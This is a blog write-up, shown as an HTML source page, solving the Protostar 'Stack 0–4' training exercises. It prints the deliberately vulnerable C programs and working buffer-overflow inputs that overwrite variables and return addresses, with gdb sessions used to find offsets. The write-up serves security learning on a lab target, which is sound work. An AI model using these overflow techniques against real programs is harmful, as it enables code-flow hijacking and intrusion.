pew
/
paulwalko.github.io
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
paulwalko.github.io/_site/writeup/nebula_exploit_exercises.html

499 lines
18 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
<title>Protostar Exploit Exercises Solutions 0-4</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="https://paul.walko.org/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
<script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="https://paul.walko.org/category">CATEGORY</a></li>
<li><a href="https://paul.walko.org/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
<li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-4</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> exploit-exercises</li>
<li><i class="fa fa-tag"></i> protostar</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 14 Jun 2016 under category <a href="https://paul.walko.org/category/">writeup</a></p>
</header>
<p>Note: When you first logon to protostar, make sure you are actually using bash. It will make things a lot easier.</p>
<h1 id="stack-0">Stack 0</h1>
<p>Heres what were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
</code></pre>
</div>
<p>The first thing I took note of is the size of the <code class="highlighter-rouge">buffer</code>: 64 bytes. After that, the program inputs text for <code class="highlighter-rouge">buffer</code>, and then checks to see if you modified the <code class="highlighter-rouge">modified</code> variable.
Im guessing if I put in a string longer than 64 bytes it will work. Lets see:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
</code></pre>
</div>
<p>That works as expected, now with 65 bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
</code></pre>
</div>
<p>Solved!</p>
<h1 id="stack-1">Stack 1</h1>
<p>Heres the code were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
</code></pre>
</div>
<p>Just like Stack 0, were given a <code class="highlighter-rouge">buffer</code> array size 64 bytes and were also asked to input the contents of it. Except it looks like modified has to equal <code class="highlighter-rouge">0x61626364</code> instead of just changing it like before.</p>
<p>Keep in mind this is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so Ill input the value in reverse order:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
</code></pre>
</div>
<p>That works as expected, now with the additional bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
</code></pre>
</div>
<p>Woo!</p>
<h1 id="stack-2">Stack 2</h1>
<p>The website says this one involves environment variables, and how they can be set, so lets look at the code:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
</code></pre>
</div>
<p>Theres the <code class="highlighter-rouge">char buffer[64]</code> and <code class="highlighter-rouge">char *variable</code> again, then shortly after that it reads in the <code class="highlighter-rouge">GREENIE</code> environmental variable. Since <code class="highlighter-rouge">GREENIE</code> is copied to <code class="highlighter-rouge">buffer</code>, lets see if appending <code class="highlighter-rouge">0x0d0a0d0a</code> to the end of some 64 bit string, since thats what it compares in the if statement:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ export GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable
</code></pre>
</div>
<h1 id="stack-3">Stack 3</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
</code></pre>
</div>
<p>It looks like I need to input a 64 byte buffer like previously, and then append the address of <code class="highlighter-rouge">win()</code>, which will write to <code class="highlighter-rouge">fp</code>.</p>
<p>First to figure out the address of win I ran <code class="highlighter-rouge">objdump -d stack3 | grep win</code> which outputs <code class="highlighter-rouge">08048424</code>:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack3 | grep win
08048424 &lt;win&gt;:
</code></pre>
</div>
<p>And appending it to the buffer:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*64 + "\x24\x84\x04\x08"'` | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
</code></pre>
</div>
<h1 id="stack-4">Stack 4</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
</code></pre>
</div>
<p>This is similar to Stack 3, except it I need to add some extra padding to get to <code class="highlighter-rouge">win</code>.</p>
<p>First Im going to get the memory address of <code class="highlighter-rouge">win</code>, but I wont use this till the end:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack4 | grep win
080483f4 &lt;win&gt;:
</code></pre>
</div>
<p>Now to figure out the padding, I ran gdb with and used binary search to figure out what the max buffer is:</p>
<p>First with predefined buffers of 50 and 100:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
&lt;http://www.gnu.org/software/gdb/bugs/&gt;...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r // with 50
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r // with 100
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r // with ~75
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r //with ~80
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
</code></pre>
</div>
<p>And now I figured out its somewhere around 80 by approximation, so I guessed than then 75, then 76:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ gdb ./stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
&lt;http://www.gnu.org/software/gdb/bugs/&gt;...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r // with 80
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r // with 75
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r // with 76
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at libc-start.c:187
187 libc-start.c: No such file or directory.
in libc-start.c
(gdb) Woo =&gt; 76
</code></pre>
</div>
<p>Alright, so I know the buffer I need is 76, and the memory address of <code class="highlighter-rouge">win</code>:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*76 + "\xf4\x83\x04\x08"'` | ./stack4
code flow successfully changed
</code></pre>
</div>
<p>There you go.</p>
<h1 id="stack-5">Stack 5</h1>
<p>Finally, we get to do some shellcode!</p>
<p>I have a good idea about how to do this, but unfortunately I cant get something to work right, so Ill update this as soon as I do.</p>
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
<script type="text/javascript" src="https://paul.walko.org/javascripts/markdownreader.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink